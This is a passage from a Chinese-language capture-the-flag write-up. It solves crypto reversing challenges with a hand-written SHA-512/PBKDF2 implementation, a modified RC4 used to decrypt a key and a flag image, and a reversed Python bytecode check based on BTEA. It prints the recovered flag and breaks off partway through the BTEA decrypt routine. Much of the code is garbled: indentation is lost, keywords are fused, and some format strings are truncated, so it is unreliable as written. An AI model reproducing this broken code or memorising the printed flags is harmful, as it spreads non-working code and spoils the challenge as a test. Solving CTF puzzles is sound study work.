0xc24b8b70d0f89791, 0xc76c51a30654be30,
0xd192e819d6ef5218, 0xd69906245565a910,
0xf40e35855771202a, 0x106aa07032bbd1b8,
0x19a4c116b8d2d0c8, 0x1e376c085141ab53,
0x2748774cdf8eeb99, 0x34b0bcb5e19b48a8,
0x391c0cb3c5c95a63, 0x4ed8aa4ae3418acb,
0x5b9cca4f7763e373, 0x682e6ff3d6b2b8a3,
0x748f82ee5defb2fc, 0x78a5636f43172f60,
0x84c87814a1f0ab72, 0x8cc702081a6439ec,
0x90befffa23631e28, 0xa4506cebde82bde9,
0xbef9a3f7b2c67915, 0xc67178f2e372532b,
0xca273eceea26619c, 0xd186b8c721c0c207,
0xeada7dd6cde0eb1e, 0xF57D4FF7FEE6ED0D,#修改了
0x06f067aa72176fba, 0x0a637dc5a2c898a6,
0x113f9804bef90dae, 0x1b710b35131c471b,
0x28db77f523047d84, 0x32caab7b40c72493,
0x3c9ebe0a15c9bebc, 0x431d67c49c100d4c,
0x4cc5d4becb3e42b6, 0x597f299cfc657e2a,
0x5fcb6fab3ad6faec, 0x6c44198c4a475817,
]
defrotr(x, n):
return ((x >> n) | (x << (64 - n))) & MASK
defCh(x, y, z):
return (x & y) ^ (~x & z)
defMaj(x, y, z):
return (x & y) ^ (x & z) ^ (y & z)
defSigma0(x):
return rotr(x, 28) ^ rotr(x, 34) ^ rotr(x, 39)
defSigma1(x):
return rotr(x, 14) ^ rotr(x, 18) ^ rotr(x, 41)
defsigma0(x):
return rotr(x, 1) ^ rotr(x, 8) ^ (x >> 7)
defsigma1(x):
return rotr(x, 19) ^ rotr(x, 61) ^ (x >> 6)
defpad(msg: bytes) -> bytes:
    l = len(msg) * 8
    msg += b'\x80'
while (len(msg) % 128) != 112:
        msg += b'\x00'
    msg += l.to_bytes(16, 'big')
return msg
defsha512(data: bytes) -> bytes:
    H = H0[:]
    data = pad(data)
for off in range(0, len(data), 128):
        block = data[off:off+128]
        W = [0] * 80
for i in range(16):
            W[i] = int.from_bytes(block[i*8:(i+1)*8], 'big')
for i in range(16, 80):
            W[i] = (sigma1(W[i-2]) + W[i-7] +
                    sigma0(W[i-15]) + W[i-16]) & MASK
        a,b,c,d,e,f,g,h = H
for i in range(80):
            T1 = (h + Sigma1(e) + Ch(e,f,g) + K[i] + W[i]) & MASK
            T2 = (Sigma0(a) + Maj(a,b,c)) & MASK
            h = g
            g = f
            f = e
            e = (d + T1) & MASK
            d = c
            c = b
            b = a
            a = (T1 + T2) & MASK
        H = [
            (H[0] + a) & MASK, (H[1] + b) & MASK,
            (H[2] + c) & MASK, (H[3] + d) & MASK,
            (H[4] + e) & MASK, (H[5] + f) & MASK,
            (H[6] + g) & MASK, (H[7] + h) & MASK,
        ]
returnb''.join(x.to_bytes(8, 'big') for x in H)
defhmac_sha512(key: bytes, msg: bytes) -> bytes:
    block_size = 128# SHA-512 block size
if len(key) > block_size:
        key = sha512(key)
if len(key) < block_size:
        key = key + b'\x00' * (block_size - len(key))
    o_key_pad = bytes(b ^ 0x5cfor b in key)
    i_key_pad = bytes(b ^ 0x36for b in key)
return sha512(o_key_pad + sha512(i_key_pad + msg))defpbkdf2_hmac_sha512(
    password: bytes,
    salt: bytes,
    iterations: int,
    dklen: int
) -> bytes:if iterations <= 0:
raise ValueError("iterations must be positive")
if dklen <= 0:
raise ValueError("dklen must be positive")
    HLEN = 64# SHA-512 output length in bytes
    l = (dklen + HLEN - 1) // HLEN  # number of blocks
    r = dklen - (l - 1) * HLEN     # length of last block
    dk = bytearray()
for block_index in range(1, l + 1):
# U_1 = PRF(P, S || INT_32_BE(i))
        u = hmac_sha512(password, salt + struct.pack(">I", block_index))
        t = bytearray(u)
# U_2 ... U_c
for _ in range(1, iterations):
            u = hmac_sha512(password, u)
for j in range(HLEN):
                t[j] ^= u[j]
        dk.extend(t)
return bytes(dk[:dklen])

先求key2

import sha512
salt = bytes.fromhex(
"3ab874d617f7814eabdf541c1c026f67"
"a8204f7a77539f9d5eb6b2d24ec8e3da"
)
key_base = sha512.sha512(salt + b"Lilac+present")
print("key_base =", key_base.hex())
key2 = sha512.pbkdf2_hmac_sha512(
    key_base,
    salt,
    iterations=10000,
    dklen=64
)
print("key2 =", key2.hex())
#fba8c6c7165864e5b56fd42bd6158b2e992367b8ea03d963e097176ae865f4038fe194d68f613d38b172c106f3826351e17e977d52b1bddd73e5db3c38227815

再求key1

key1_enc = bytes.fromhex(
"3fe1a533f6c9becd3dfff19a57501672"
"2894b26ee7f9116b750a703ac28e6c32"
"de769399683f2a19ab2da84985ef0880"
"05057a4b8ce190098c027ba4423cb459"
)
key2 =  bytes.fromhex("fba8c6c7165864e5b56fd42bd6158b2e992367b8ea03d963e097176ae865f4038fe194d68f613d38b172c106f3826351e17e977d52b1bddd73e5db3c38227815")
defKSA(key):
    S = [((i + 4) & 0xFF) for i in range(256)]
    j = 0
for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
return S
defPRGA(S):
    i, j = 0, 0
whileTrue:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        K = S[(S[i] + S[j]) % 256]
yield K
defRC4(key, text):
    S = KSA(key)
    keystram = PRGA(S)
    res = []
for char in text:
        res.append(char ^ next(keystram))
return bytes(res)
key_dec_key1 = KSA(key2)
key1 = bytes((key1_enc[i] ^ key_dec_key1[i]) for i in range(64))
print(key1.hex())
#3c51fad33b9889664889b74e5ddc3f1849dbe1f64327582c5618984bec925557a16b692ac23864acdbb2776b0291b48f2a5caf1d6a6395c16d5cc99556939f3d

最后解密把最后的md5值去掉

key1 = bytes.fromhex("3c51fad33b9889664889b74e5ddc3f1849dbe1f64327582c5618984bec925557a16b692ac23864acdbb2776b0291b48f2a5caf1d6a6395c16d5cc99556939f3d")
defKSA(key):
    S = [((i + 4) & 0xFF) for i in range(256)]
    j = 0
for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
return S
defPRGA(S):
    i, j = 0, 0
whileTrue:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        K = S[(S[i] + S[j]) % 256]
yield K
defRC4(key, text):
    S = KSA(key)
    keystram = PRGA(S)
    res = []
for char in text:
        res.append(char ^ next(keystram))
return bytes(res)
key_dec_flag = KSA(key1)
with open("flag - 副本.enc", "rb") as f:
    enc = f.read()
ENC_OFFSET = 104
CHECK_SIZE = 16
enc_real = enc[ENC_OFFSET:-CHECK_SIZE]
flag = bytes(key_dec_flag[i & 0xff] ^ enc_real[i] for i in range(len(enc_real)))
print(flag.hex())
#ffd8ffe000104a46494600010100000100010000ffe201d84943435f50524f46494c45000101000001c800000000043000006d6e74725247422058595a2007e00001000100000000000061637370000000000000000000000000000000000000000000000000000000010000f6d6000100000000d32d0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000964657363000000f0000000247258595a00000114000000146758595a00000128000000146258595a0000013c00000014777470740000015000000014725452430000016400000028675452430000016400000028625452430000016400000028637072740000018c0000003c6d6c756300000000000000010000000c656e5553000000080000001c007300520047004258595a200000000000006fa2000038f50000039058595a2000000000000062990000b785000018da58595a2000000000000024a000000f840000b6cf58595a20000000000000f6d6000100000000d32d706172610000000000040000000266660000f2a700000d59000013d000000a5b00000000000000006d6c756300000000000000010000000c656e5553000000200000001c0047006f006f0067006c006500200049006e0063002e00200032003000310036ffdb00430001010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101ffdb00430101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101ffc00011080041016b03011100021101031101ffc4001d0001010003000301010000000000000000000806070904050a0203ffc40044100001040103000805030201060f00000006030405070200010809161755569596d312131415d41137b57685240a18213141512225343536394574777983b3b6b8c2ffc40014010100000000000000000000000000000000ffc40014110100000000000000000000000000000000ffda000c03010002110311003f00fba717171d2b1d8428288489229922898e9b72e66e39a4a6cd76936893d4a3a3927a92e8b062c115d366924cd36fb38d9becf1e6cb3e5dc38503df76715e780c33d2f07f83a076715e780c33d2f07f83a076715e780c33d2f07f83a076715e780c33d2f07f83a076715e780c33d2f07f83a076715e780c33d2f07f83a076715e780c33d2f07f83a076715e780c33d2f07f83a076715e780c33d2f07f83a076715e780c33d2f07f83a076715e780c33d2f07f83a076715e780c33d2f07f83a076715e780c33d2f07f83a076715e780c33d2f07f83a076715e780c33d2f07f83a076715e780c33d2f07f83a076715e780c33d2f07f83a076715e780c33d2f07f83a076715e780c33d2f07f83a076715e780c33d2f07f83a076715e780c33d2f07f83a076715e780c33d2f07f83a076715e780c33d2f07f83a076715e780c33d2f07f83a076715e780c33d2f07f83a076715e780c33d2f07f83a076715e780c33d2f07f83a076715e780c33d2f07f83a076715e780c33d2f07f83a076715e780c33d2f07f83a076715e780c33d2f07f83a076715e780c33d2f07f83a076715e780c33d2f07f83a076715e780c33d2f07f83a076715e780c33d2f07f83a076715e780c33d2f07f83a076715e780c33d2f07f83a076715e780c33d2f07f83a076715e780c33d2f07f83a076715e780c33d2f07f83a076715e780c33d2f07f83a076715e780c33d2f07f83a076715e780c33d2f07f83a076735f6dfe9c418452cbfd8a22391082b86ffefc16459e0aa797fbb2c33c72dbfd9be8271353935072794161d9247ec915934da3b092fa87ced041e316b21f4b93a5f3516551699bbcdb34f9aa679a6d12412cb3cb7c37cb70a3ab8fdbc03fe8c17fe0d8e8333d0340d0340d0340d0340d0340d0340d0340d0340d0340d0340d0340d0340d0340d0340d0340d0340d0340d0340d0340d0340d0340d03410ddc5fb8c45fda3f828cd05635c7ede01ff00460bff0006c74199e81a0681a0681a0681a0681a0681a0681a0681a0681a0681a0681a0681a0681a0681a0681a0681a0681a0681a0681a0681a0681a0681a086ee2fdc622fed1fc146682b1ae3f6f00ffa305ff8363a0ccf41cf1e92cbced3e3fd2d5516d4653d522125e58f18eb39a90fb20e4f7d68458769c30e18427d213444d316df778576e19fdc9a36425e3fe67d445bf64ef0c17c4377f33cf3b31e305bc79dbd7f9b07572018bcedebb2dedabb37f9a410ecfef1d96fd1c875c3eafea7ecdf6ffa35fe47dcfee3f0edf47f16213b417216c8dfa4a1d5132560b77745b1e020ede4a46bb8019876aa1db8b61f0ebf3a7338a44a24b1cddc8d37c315a11c4ee23cc13db271f6d49de19b9dc37b07f37f8e06f638a555144e73105d60e13ca56aa9f5197cd5c196a2634d11929552a7b32cbacc4ab5b4f0fb32e91046675f1692633a339759a0b79280c7291c43ce3ae66f1e6bdb125ea997292d203b18650d22731157d3b745d0d6b060438acb423cb7e7e9faf4e4729f6f24c1bb8996cad9f2e258663a82c49bef8c0259c96213cd8360dfb6ff002eedbe3bd3f75ad4bc0d6fc3c82b2856706c3eba3258b2d5bb672c1160c252577600a9836d856b4c40dbccc48f0db68bd89a4271caa49292510cdac3661236fd241744f747d0cb61b49935e91e25b81bf041c89bc8f815321ce58b0925208b4fde0da91d842ac290c28c9f5d1861840aa33b44a8d1a2cc9488c5c6db052a267bc8fe48dd56371feb8bfa72adabb88e801d7976721602bcabe6ef4bcaff00910ac08484784923caf8868a00111b612e39306cf9ad3445232f3f27b0f8aa61318cd776e833181b7ae0e367296afe345e966ab79d6dc8e1f3c92a2ee72c1e080eb6a02c2ad22d91097d5964b1ac05c1ab1308c9a1a76e08abe29110003958cc21e48609a24a1daacca320a1233989c7198e374f72ea36c5fa9e3c8c4398cfce585d513b47e8624065e5204b5df54d71848e1cfda656164dafc86634e1cbff00a6f9f188bc6cb375950a087a7a24aa020c9e05dfd7c191c3c6cf42bef90e5afd644cc32424239dfd33d45bbc6ff50cdc22b7c876dd0728fc7f2d7452571cf0c439f0cb9167b1dd26571d245276c22f8fc03c1e0dbc3786958f168c8c1d2a716810c312194897ab16dc8526090c466183c6b244198eb06ed947f8316ee3e739c83355ba4ab856cebeaa6d593b89d41d7b79154f05d3e5047575c436c6c6211e895e65cb7134a7abe8e792cc655a37cdb87ce376dbc11ecce6d8741e48867de348c5c32065cf6e344a04df664c0b0a1838e3485bb3eb780cfeacb5a9ab505c6531c744f1930e2afb982400f5486228e66ba63a4080f2b0130f9270c18c9aceda3b4500d274c06f35792155415f07dcb136e33925a636c8d4068aa62aae3fce57f578dcf476d28150d664a5df5259f66596678b1771ce6c67e30735241bc7393a83128215ddae240ec3cee3a74818c104bef45f25e4c5abfe51417210b38bcfa143e20cdd00585618d8821634090893d5d94e600d1163d6ee9b968e0d9e93fd722f1099178c9f2b7b0f93e741bdee6e7171738fb64405476eda38091f12460a4d47c3ec1b6090336b10727aceb01292202317149a1813653a7720d0799382a99864f270a64e94c938f45676986d733bceacafec9a9aa12c28fb6d8f78b92d6d578ba108472eec93705854c80b1caaea162246347e3a16296417712a4ef61a3155976ec5abb5dfae935cc33a2b7aea345c924592bf25e47c04c3d68b7c09a9f29d358e72bb757e5ab828929f2d54f0cfe0570cd3cbf4f873c32c77df6dc38f1c0ee94eaa4b3885c7431e4f5c935296919e2c856c4b511a50fd3a7a22c8233c971d1b123bb82b7ab92e3ad625ae105079b2c2e48582924c1293857d2d1ed709c62e9f06ee94b0af1e50f2e390b42d477d91f1cab0e2a07d751850615a075405d601dde36cc3be2d6b112995dd5f5a6331d5e0006b4875978f1f148623222321789e666c9843e0c960fefc27e7c40db83f5f5457b9045c1f2cdc9af20ea1988188112d8a173e2fe2e93610160920bc9291cf8621f695817c366d80a3e264e5506f3aedb45b476de21efd2055633caee3d98ca7216146acc8a9593e29bf5a32ff006a9469025bd74f1b0f2e52e5378ab9884109b4db42b47ab38722eace3541eb09087556c26583c60806ccac6c90db8ebb0ab5abb94733607620d441807ccbb849e1c5e5872799a52111259c194464290c662f992e8b949b4bc5307b8a4ae192ad93f8b6db41cfc61d220ddc748b1670ddc835858048fd363040cc95971bb9332644ead39db29f88b9ca4665880ae2d0f4b36876e82ad2d97cc11acdfca64e5442cecd168e18221e1d2c75c85e78c85876d057204b38c7c6319b1ec1ac295654e80d4539695c38d7f36d44c8ed7b00b790b58dc8331622f0b20cb238083026bb1b96da371da6894ca672599c5330d99c7abcad21fe49595c27e4091439f9c86d6835765437331878d1298b7a9e9b9c7c1f298d801d0a9b7188bb4804ae3d26257280cc6042cb184fc2cf410504e3bbc806c178c848308860fa5655f338c8b8c66e6424a4a41ca2c9847b0648e6e5e3e7cf1ce693768cda3749470e5cb8513450453cd5573c30c32cb60e2d736ba500298d022c51c51b5c9a14b0aaff00a102c44ea7a8a3f80afed21322b98785ec0614e9f5d355b1a9ee345e89ef3eeb692aa26cb9e203683b31847a8c5b2da7100ba79542f6b60236159d03cc927e310bd7b5d4f4fc6f56c12847c2a8cac44548c9bd21b827af1af2d1773038d976b1d8b58e047b512cc22f69b4a466671f4845488f862f4af3263dbf08f8fdc9fe5b2b114d93da60a06fe5c5d84195b990983c356b8670a2b5c576d9a90d9052445b8ee9c80b8040451299bb6ee7e95b339151aacb6832d29e7bf15c06b44adcb28fc8aa806cac21cab9cbbb7aa0baaa59f87312ec545069b9203d8f5d8b9c8b40cca28aee599a918dc58566d1b3b77910e0d9ab85520c944f98b419899d695e329d3b1e36b8999e48564356552179d452662c6b36d10f8c9dc5256ad6e1b8fd3c7b09d8d9060ab9cdbe0471ea387c35bcc348f9159a87aab879cdc59a0e52cd88b6ad2c44ddd3220047768abb86585391814316795752c0decd4d8d89cc4324ec888365116d0a8bf5a71bc6a0e481fc6b51e6ae25120f14379ddc5d3d3c1aae074f487ac478c08652b27b3f51dce1c1171478bb641fcc3aa3ece30af60ab5bbd34e2dca334c3b262c32ca6a073de7a1319086c337d88683e197485a5ca4bd794f52c8041e0eb3a9ae6581aae7ce38e9c920e41d87c65762c4726eedd2e3c058f11003a773f2531f680b2f5abe257307bc2ecc46a5f774da62543a68beebe282d9364d259ce2929bb74975b36e82abed86fba49ace1341d288259a9f0e2a2d836719a586fbe78a0b658ec9e41cb7aa2f6e57b9e9299ee3b5d44b562003bf0dd95e1155c5563522ac68a14cb5bb90962ce5ad22fcf02db364222318bb66993b014a78765dabc49556a98b9369bbf701e7d49d2228591cf5e41f139d035851e255940d4ad81e7f1e367265a4c3f332b48bdc1abcb108a480531103afd3da2229b801694b41513314937f34326a5b1d20d308e095273983ca163d18bcdcbf10b67e1b9e97e4cdec080473d43af37fb40603722a30287e0bab398ce62921f4622e1685fb9ccc34acab8f8fee4f5e3b93c7077885e6436cd9e17ce9e3b56991abc21abb91544dbd3322092d0822dda019ad37b57724cca840821c7634b9d6c5cc4c6523ca208b2788e29259a453f194c7be43f692617b681a086ee2fdc622fed1fc146682b1ae3f6f00ff00a305ff008363a0ccf41c85e9a899881de2dd4440412b1b050305cdae1ecccdcdccbe6b19110d111972c1bd929595927aaa0ca3e363d920b3b7cf9dac8b568d5155c38553493cf3d8301e948e54f17ef8e8dbe660e51dc90a16e52189abe12665606a9b82bdb126632236b24219ef2b2116204530f9946ecedcb76bbbe72826d7672ba286eafcd570c720c0ac532b0ebbe909b60f6a411ebf59e1bd0bed096bf0bfa776f7ace5d0d69cdbf8186fa160a24fe43eb6450411fb7305527d21f17d1b351372ba59ec1112d63e16d58dd1196214748d9f7362e875cb0acde9c085750150055014d267a284b26e608fc26a2018c980db4992686e1834cae53b746b3b1f1d62b9850f868fc4a18448747784979d49c4622e5c52fcb7b143a97e4013f2fee5b7e3d6b4245805c9721abfb4e7b0755498548ea5f66185b9b7d918a00098d8066473e3f3c3f80cbe876128f58b274146522be119d257cbf837d8aa4b284bc7ce34d8f146b3e82ec0a8684e4886dd1f654fb58d6a9c5c220143d290b22590eb2e38cce73992b9f40d088ab06d018c104aa03c7cac63fa79ee4356d10eb07cd787e2f793188de417c8623ede382ace9f2ab1188feffe01a95cd57e30c205f4ba49ecedc24e241559451575f1261b26b03810e0072bf98503c919c85a9a94e56dbcc39174a7200d5ef572a178593c0b1f0b645426d64cdb86e1e0f614649052e4823044b250db188dc929b8c2f2b211af631906432e4903ce9e667184d2879340f78f5c464edd3f2dbde0b070f2a638b4cf829d5601f5ed4e7cd90cc7ad17830d1f93cdd832c0b29362e24e118f1b9b93d8a5c670ccc393aaf206a4a6ba12395fc3db04ca2e139555ec17292b52ae3b6ee127171b19223b20b091894a35fa4a6448fab44838ae28e1fd98ca3d7086421b3d9a5a6f64592d8e21f4dbc7cfd84a43ff00086b5ffe190ba0f9dbe90ea4adfbbfa49ae88caa5ab83e8f0de0ed0e7f6a71a769450659f2c6ad15e41124a93d12e0ce353c48461e11a6d91770ff006e769c511c8b14850a99c8404dbbc110a02dde43509cb4b67a17ac7a39e44490323cacb061dc86ad18ce2e6aad2b13e3c972ca57a5e1dbe1b66185c08f9bb0c718659b21b32fa78c968451c44b98992701ecb9514938e45f48c72b2838c7ada2246e8e87c94076afdce6b20c319c97b9c9a3879e4c66d31c97519b19159b6eb298a6bae833dd7d904f3df7f9598545c78e90de3800d101007c9fb381f8cdc85a882a0006d3a0ed89d681d67a2581c3ec2317715b82cbb9eb55b828658b54656b222ac1819479eb19262c871cc8ce6cea2db846e6bc5eb6acde35734b9749811306de05dca119e70719004ae31e0c58a3b0fc651c181eae630b869f62cdf0c9559a10265bb4987cca384d453439651042d5a4eb45a3634336ab29515e937a239cdc9572c76450e680fc555fc79937acfedf2c275f71fe373c6b69f6aff2cf074df3797fe24e739e58e68a0b37630bb2d8aa923bef90653d1c06f39cd6b837e5d58904ac6ce71c28716e21b68b958dc707713c817593028e57ca3472aef9658a8d26a342829155b6db6dba4ca711dd5c93719e1b07638e7fe84987f4b107f12ef41f34283062d7fc983df66cc9a37db7a47394df641b228edbc9a9c88ddde723bfcbc31ff1d9badf7739bbff009464e37dd6dd4dd4ff0085a0b5a9db66b7e13f2e396af393d630e53a09ca319a0af4a66c3b366e345c24d5d85d4b115c5a2190e5b2d9338d7d618fc9c64048ee0b9c82853290934c25a0e2645bef20e1308e0a04ce78f7c3204e9112912270c23ac7a45acce6cc905cb43bf8a308ee3a7238fa52b4201f20855a35c4f403b97ab89074c2787241aed2518e11d99c8b76f2d1c8a6cc34259f5bd9b4704514c1ac3e31f6174c7d132f49dc3230a9abbe7157a5db7d43dbdb4cc93668c9e7d52c3b4f5df6d8e7dc9e65fa24d04d9b66aa47a382696c1f5aa2a37141a30382104d9367082b030e370ed114924116b15071ede323db248a38268a29a0d1aa29609258609278e3b609e18e1b6db6c1c9699280ea93a676525ed52d18afe1af8e0b84d73523f329b6632c2c43f1fbd5f6f2e00272530ab1613a6c9b721857488ac53b753ee9ac9b55dab1571cf7df10f43c23b96ace8fe042be18f2eec006e3bcd55d68db331501d5ba491d5c5697bd38727721600c15d75619abf8b1326241fc0db018b04323e6322913988fc1c49c32119251ef9c86e0a03673c97e769df3405636611e3e8571c6178df4c1acdc2cc0ea5744bcf1de7661fd8800ce658c7bc9da9d822d85a044cf716f9c01e3ece5e5829f4a8db56f31241b87a4bab5b1ee1e0472b2b5a91a4849d86574f92321e8589dd6fba9264df142464c563316fb6ee15902b85672238c9ba18e4b3973289b74b0cf3531c770e4bf3b7995c4fb9b803c7709a64b868e48d5ba3842d17ae02d5c25c9b8fd9c2da20bb28dae61d86c5cbda61588ce2de81348f3e6e3aaca13394c722117abeeb609074bb9647fd194f8a2421f9792fc7c89b7abb8357a98b5a4ca184790716ce519a5351f33c649e9a670f6ccb4aab27b2698b14f1e24646450b1631583829448fa01dc7b00e6b8cbbbeab184e891e4d737dbd8995694db9e4543dc2576d45484995d352765b27e31c6cb67904bacd1dcd0cbf6c19bb214343c2fc5b6e1b3f3f9ae7d29132324f9d6414274995c94a721686e30cbd476081dce10dba48387b05244c0b33147602f9fe464e57790cd4ae19492129e76c905d1c6663e324e41689cdc20de59168b2e92598527d292093595181fc980660e9fd99c22b544793834d587c1b3c980f1273bc75d02bb6fbedf3156c4550ca17e0a34473c5476f19304f64dd6fb6cd170e5372ae29432e891e64f324cc65ee73dcd6b8a9eb9990f3c8c4dfcfb5a162edcab44285075d965b66a3b51cd670ad09d4825314f04a70ea5d8e6dbea3370b2e15df29ef2a7b99127c13a378926231665a431cafa4aec2d8309d9a3f9be3755f4c6ef1dd852574422296efe9194628c837004c28f1b8b14c813482c20ce15cc8349162d8363f048b046bde6e749a52a6a5a32336d589ca389b82bfaea7269944189dd67334781ec89a058fc92ad250ac7d8b9839a6333283ed6459c33c8b74948acdf1dd0cd60ec3683934c3febbc22ff00cb587fff00b152fa0c7eb32c10aa3a61f97f0964970c834cf22a8ce293ba3a30ae6590f3bb5550d67608d94c500e330a32c0ba7a0a49bffc67043ca494ab468ba0f1669837cb3cd30d712e37c5e57a33796e3cbf2a7e9e9894e4ade2f8f6f0ec3ac35bb3c339ae52e0524011d9a60bec565bd562e7688275961974e2a6fe2eb432c128cdb36f88531c934f624e74f475094238eac4ca30bc8db0f0b3a1f175b97ee2422335db69cabd9b09072b08e627686f3d1b89a2a522c5128c18c135581950c2fd991845874d340d0437717ee3117f68fe0a334158d71fb7807fd182ff00c1b1d0667a0681a0681a0683453ce3f8a67c848de4a43ce960b9e6d5fe75799c641b980c84ed00d6724f66c523cea366876664b17809392b352a29321d3221309e735291938fa7205c6312986f5d0340d03412d1a17735d894cd34af38fdc5a290a41e6f80e901a730ad902299561f2d3df673341f07c1ab222601e6eaeeae1bb16272488ec9e09abb486f92b922905001ce8c5f0bc23bb02086860d17629a847001c5928742f1525be597cd69085f36175dcb1031c31db0dd3907e1034e14cb2cb1ca312db0db2cc325d0340d0340d062c6cf0d980acd3cae07854acdd06b8e63c3c6c632f5f8aca3cdd7471cdbcd18c102d972f02d716d92eb62ed882922b9ae9a2df765826be6e9b8687072ce694815c333b2a81e2f0983aee15c484881f97b6bd845716d766cbe68ad0c193fc20ac62279c28f316c82ad9f1e0e269365577783b5956e9b274150e81a0681a093890c79d0d48269b0871cf89b382a84a3d487664939a3700a904ac2a6e14c639fcd0cc5f024ca3a0251d35d9259ec4312c24691ee3351b2137249a78bb542991d5c81cc0c3382c8c8685275e2d8aa430e3b3af49e062e6946c9e524c2188e487446427a2da3bdd5418cbbe151c7720db04dd38848c555c99a21ee34184d86fec78c149079538a049a9ca59b3da2876c3b0276b0147a9e6ed1c1fe72066375a5bb31199b66392ee19a6d80e5f17ced3459acac7a2be6fdb86a1ae8a79832656c59db545f1ac241d449e6526455d72bad0b44ada2f836533609b10d25e1953f112293979b2283c59c1dc5e6c5b66a3b45bc82a962c960a5340d0340d04bbca3a10df9261fbd428da7195f52c6ad5c415e50d1a0b2d29671d86b976c157c260d65236340c2d66cc8a39bc88d96bf90adec391911e997ade0971792c5195c03d1f3078971bca5e2e4ff0018a18ad0aa61e516adb18a9d6c31d6b6d011b5b9a0b15b18b6e3db900cfd420e5a8c250a967f7a6ff429b8c5e7c0f3e9fe9170ae504be4a08a3f17c5f2924d2f8bf4f87e2f9786d87c5fa7ebbfe9fafe9fafe9faeffa7fabf5dffd7a0c48fdf5831a272af2ac180d32394766bf641c3f3b9bad44e437cde2183dda54d076bab62621f66ec3274e5aeed00a73778f11418abb3145ca920d434cd7c55cc7922c8c676ad11c670c0657677f7923afb9676959a58c37c19af9b1da302c8f85952c3cb6ce5fe2d9b3bddd1ec2eec99aabbe4767eb374e3dd0531a0681a0d0aeb8f62d29c8987e4a4f9198909608d7d375d5782926e46d302aea38b5ec3bd389c188f8b188d23744e69d5e8267332858524e8b28e8dc580cb21f6efa5707e1beb40d0437717ee3117f68fe0a334158d71fb7807fd182ff00c1b1d0667a0681a0681a0681a0681a0681a0681a0681a0681a0681a0681a0681a0681a0681a0681a0681a0681a0681a0681a0681a0681a0681a06821bb8bf7188bfb47f0519a0a74226e1a286a146a4a563a3e6862263a065239ebc41a3a45c4534458fcfc5170a259acc9dec86ce193e4b0ddb3c414c15472fd37cb0c032eeb18f77ec379a31f7f40eb18f77ec379a31f7f40eb18f77ec379a31f7f40eb18f77ec379a31f7f40eb18f77ec379a31f7f40eb18f77ec379a31f7f40eb18f77ec379a31f7f40eb18f77ec379a31f7f40eb18f77ec379a31f7f40eb18f77ec379a31f7f40eb18f77ec379a31f7f40eb18f77ec379a31f7f40eb18f77ec379a31f7f40eb18f77ec379a31f7f40eb18f77ec379a31f7f40eb18f77ec379a31f7f40eb18f77ec379a31f7f40eb18f77ec379a31f7f40eb18f77ec379a31f7f40eb18f77ec379a31f7f40eb18f77ec379a31f7f40eb18f77ec379a31f7f40eb18f77ec379a31f7f40eb18f77ec379a31f7f40eb18f77ec379a31f7f40eb18f77ec379a31f7f40eb18f77ec379a31f7f40eb18f77ec379a31f7f40eb18f77ec379a31f7f40eb18f77ec379a31f7f40eb18f77ec379a31f7f40eb18f77ec379a31f7f40eb18f77ec379a31f7f40eb18f77ec379a31f7f40eb18f77ec379a31f7f40eb18f77ec379a31f7f40eb18f77ec379a31f7f40eb18f77ec379a31f7f40eb18f77ec379a31f7f40eb18f77ec379a31f7f40eb18f77ec379a31f7f40eb18f77ec379a31f7f40eb18f77ec379a31f7f41f9c894730c72cf39f84c30c31df2cf3ca558e38e38e3b6fbe596596ebedb638e3b6dbefbefbefb6db6db6fbefbfe9a091ec01b33302e972314185a647e47763f6d94c5eb76a9be4da46b362ab8412718eca64db372d96fa571b7ea93b6fb24e90cb34164f2dc377dafff00647febff00f9d069bd0340d0340d0340d0340d0340d0340d0340d0340d0340d0340d0340d0340d0340d0340d0340d0340d0340d0340d0340d0340d0340d07991dff3831ffbe35ffdfc3415e683ffd9

文件头明显jpg，扔010里保存下，打开文件得到flag

Lilac{YOu_knOvv_h0w_tO_d3crypt_1t!!}

ezPython

基础的3.9python的pyc逆向，myalgo这个库直接反编译的会有问题，需要看python字节码修复

加密就是一个BTEA

main
import struct
from crypto import *
from sys import *
import base64
import myalgo
welcome_msg = 'V2VsYzBtMyBUbyBUaGUgV29ybGQgb2YgTDFsYWMgPDM='
input_msg = ':i(G#8T&KiF
right_msg = 'UmlnaHQsIGNvbmdyYXR1bGF0aW9ucyE='
wrong_msg = 'V3JvbmcgRmxhZyE='
print(b64decode(welcome_msg).decode())
flag = input(a85decode(input_msg).decode())
ifnot (flag.startswith('LilacCTF{') and flag.endswith('}') and (len(flag) == 26)):
    print(b64decode(wrong_msg).decode())
else:
    flag = flag[9:25]
    res = [761104570, 1033127419, 3729026053, 795718415]
    key = struct.unpack(', b'1111222233334444')
    input = list(struct.unpack(', flag.encode()))
    myalgo.btea(input, 4, key)
if input[0] == res[0] and input[1] == res[1] and (input[2] == res[2]) and (input[3] == res[3]):
        print(b64decode(right_msg).decode())
else:
        print(b64decode(wrong_msg).decode())

myalgo
defu32(x: int) -> int:
return x & 0xFFFFFFFF
defMX(y: int, z: int, sum_: int, k, p: int, e: int) -> int:
return (
        (((z >> 5) ^ (y >> 2)) + ((y << 3) ^ (z << 4)))
        ^ ((sum_ ^ y) + (k[(p & 3) ^ e] ^ z))
    )
defbtea_encrypt(v: list, n: int, k) -> bool:
if n <= 1:
returnFalse
    DELTA = 1163219540
    y = v[0]
    z = v[n - 1]
    sum_ = 0
    q = 6 + 52 // n
while q > 0:
        q -= 1
        sum_ = u32(sum_ + DELTA)
        e = (sum_ >> 2) & 3
for p in range(n - 1):
            y = v[p + 1]
            v[p] = u32(v[p] + MX(y, z, sum_, k, p, e))
            z = v[p]
        y = v[0]
        v[n - 1] = u32(v[n - 1] + MX(y, z, sum_, k, n - 1, e))
        z = v[n - 1]
returnTrue
defbtea_decrypt(v: list, n: int, k) -> bool:
if n <= 1:
returnFalse
    DELTA = 1163219540
    q = 6 + 52 // n
    sum_ = u32(q * DELTA)
while sum_ != 0:
        e = (sum_ >> 2) & 3
# reverse order update
for p in range(n - 1, 0, -1):
            z = v[p - 1]
            y = v[p]
